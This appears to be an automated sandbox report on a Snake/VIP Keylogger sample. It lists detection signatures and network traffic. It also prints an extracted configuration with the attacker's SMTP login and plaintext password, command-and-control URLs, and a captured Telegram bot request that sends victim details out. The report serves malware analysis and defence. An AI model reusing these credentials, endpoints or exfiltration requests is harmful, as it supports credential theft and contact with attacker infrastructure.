Windows Analysis Report
VbcXXnmIwPPhh.exe

Overview

General Information

Sample name: VbcXXnmIwPPhh.exe
Analysis ID: 1519406
MD5: 401098a467fc699acb2d256da47fdace
SHA1: 87484e36df3eb0290178e4ab85b5566fb6f92b16
SHA256: c803bffcf528efc9a204a34a6a9285128f9dce25d165020fc37198d16ee50c11
Tags: exeMassLogger
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: VbcXXnmIwPPhh.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: VbcXXnmIwPPhh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: VbcXXnmIwPPhh.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
Source: Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 0168F8E9h 6_2_0168F631
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 0168FD41h 6_2_0168FA88
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF0D0Dh 6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF1697h 6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF31E0h 6_2_06DF2DC8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF2C19h 6_2_06DF2968
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFE959h 6_2_06DFE6B0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFE501h 6_2_06DFE258
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFE0A9h 6_2_06DFDE00
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFF661h 6_2_06DFF3B8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFF209h 6_2_06DFEF60
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFEDB1h 6_2_06DFEB08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFD3A1h 6_2_06DFD0F8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFCF49h 6_2_06DFCCA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 6_2_06DF0040
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFFAB9h 6_2_06DFF810
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF31E0h 6_2_06DF2DBF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFDC51h 6_2_06DFD9A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFD7F9h 6_2_06DFD550
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF31E0h 6_2_06DF310E

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49727 -> 217.12.218.219:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 217.12.218.219 217.12.218.219
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.96.3:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.7:49727 -> 217.12.218.219:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.jhxkgroup.online
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 11:44:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77af5
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0Q
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.000000000325B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
